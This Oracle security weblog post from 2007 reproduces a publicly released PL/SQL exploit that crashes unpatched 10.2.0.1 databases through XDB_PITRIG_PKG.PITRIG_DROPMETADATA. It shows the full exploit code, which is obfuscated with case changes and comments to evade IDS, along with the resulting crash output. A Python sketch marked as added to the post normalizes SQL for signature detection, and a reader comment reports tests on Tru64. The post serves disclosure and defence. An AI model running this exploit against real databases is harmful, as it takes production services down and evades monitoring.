
Pete Finnigan's Oracle security weblog



Exploit code to crash an Oracle database posted

November 6th, 2007 by Pete


Last Friday someone calling themselves oraclefun at hushmail dot com posted an exploit for the Oracle database using the package XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA. No vulnerable versions were given, but Alex posted in his blog that unpatched 10.2.0.1 and 10.2.0.2 systems are affected and crash. I tested this on an unpatched 10.2.0.1 database:


SQL> grant create session to x identified by x;

Grant succeeded.

SQL> connect x/x
Connected.
SQL> edit
Wrote file afiedt.buf

1 -- Utility to free Oracle memory
2 declare
3 larry varchar2(32767);
4 mary varchar2(32767);
5 begin
6 larry:='larryellison';
7 larry:=larry||larry;
8 larry:=larry||larry;
9 larry:=larry||larry;
10 larry:=larry||larry;
11 larry:=larry||larry;
12 larry:=larry||larry;
13 larry:=larry||larry;
14 mary:='maryann';
15 mary:=mary||mary;
16 mary:=mary||mary;
17 mary:=mary||mary;
18 mary:=mary||mary;
19 mary:=mary||mary;
20 mary:=mary||mary;
21 mary:=mary||mary;
22 mary:=mary||mary;
23 xDb
24 /*Mary*/./*And*/XDB_PITRIG_PKG/*Larry*/./**/PITRIG_DROPMETADATA(mary
25 , larry);
26* end;
SQL> /
declare
*
ERROR at line 2:
ORA-03135: connection lost contact


SQL> connect system/manager
ERROR:
ORA-12514: TNS:listener does not currently know of service requested in connect
descriptor


SQL> connect system/manager
Connected.
SQL>


As you can see, running this Oracle exploit code causes the connection to the database to be lost. This in fact has crashed the database. I had to restart the database:

[Image: Oracle 10gR2 exploit for XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA]

The interesting thing with this exploit is that it uses some IDS evasion techniques. It uses case changes and also embedded comments to throw off IDS and IPS software that use simple rules to detect this type of attack.
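
For anyone writing detection rules, the sketch below shows why a simple string rule misses the call as written above and how normalizing the statement first (removing comments, folding case, closing up whitespace around the dots) lets one signature match it. It is an added example, not code from the original post; the function names, the optional schema prefix in the signature and the comment-only sample are assumptions made for illustration.

```python
import re

# Call named in the post, written the way a simple IDS rule would store it.
TARGET = "XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA"
# Assumption: the schema prefix is optional in the rule, so a call made
# without it is matched as well.
SIGNATURE = re.compile(r"(?:\bXDB\.)?\bXDB_PITRIG_PKG\.PITRIG_DROPMETADATA\b")

# String literals are matched first so that comment markers inside a
# literal are not mistaken for the start of a comment.
TOKEN = re.compile(
    r"""'(?:[^']|'')*'   # string literal ('' is an escaped quote)
      | /\*.*?\*/        # block comment, may span lines
      | --[^\n]*         # line comment
    """,
    re.S | re.X,
)

def naive_rule(sql):
    """Case-sensitive substring match on the raw statement."""
    return TARGET in sql

def normalize_sql(sql):
    """Return a form for matching only: comments removed, case folded,
    whitespace around dots and elsewhere collapsed."""
    # A comment acts as whitespace between tokens, so replace it with a space.
    text = TOKEN.sub(lambda m: m.group(0) if m.group(0)[0] == "'" else " ", sql)
    text = re.sub(r"\s*\.\s*", ".", text.upper())
    return re.sub(r"\s+", " ", text).strip()

def detect(sql):
    """Match the signature against the normalized statement."""
    return bool(SIGNATURE.search(normalize_sql(sql)))

# The call as it is written in the post's SQL*Plus buffer (lines 23-25).
POSTED_CALL = (
    "xDb\n"
    "/*Mary*/./*And*/XDB_PITRIG_PKG/*Larry*/./**/PITRIG_DROPMETADATA(mary\n"
    ", larry);"
)
# Constructed sample: the name appears only inside a comment.
COMMENT_ONLY = "select 1 from dual -- xdb.xdb_pitrig_pkg.pitrig_dropmetadata"

if __name__ == "__main__":
    for name, sql in (("posted call", POSTED_CALL), ("comment only", COMMENT_ONLY)):
        print(f"{name}: naive={naive_rule(sql)} normalized={detect(sql)}")
```

The normalized text is meant for matching only; alerts should log the original statement alongside it.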

There has been 1 Comment posted on this article

Steven says:
November 8th, 2007 at 08:13 pm

Tried this on 10.2.0.2 on Tru64 both with and without CPUOct2007. Both versions had the following error, but neither database crashed.

exception system: exiting due to multiple internal errors:
exception dispatch or unwind stuck in infinite loop
exception dispatch or unwind stuck in infinite loop
declare
*
ERROR at line 1:
ORA-03113: end-of-file on communication channel




This is the weblog for Pete Finnigan. Pete works in the area of Oracle security and he specialises in auditing Oracle databases for security issues. This weblog is aimed squarely at those interested in the security of their Oracle databases.
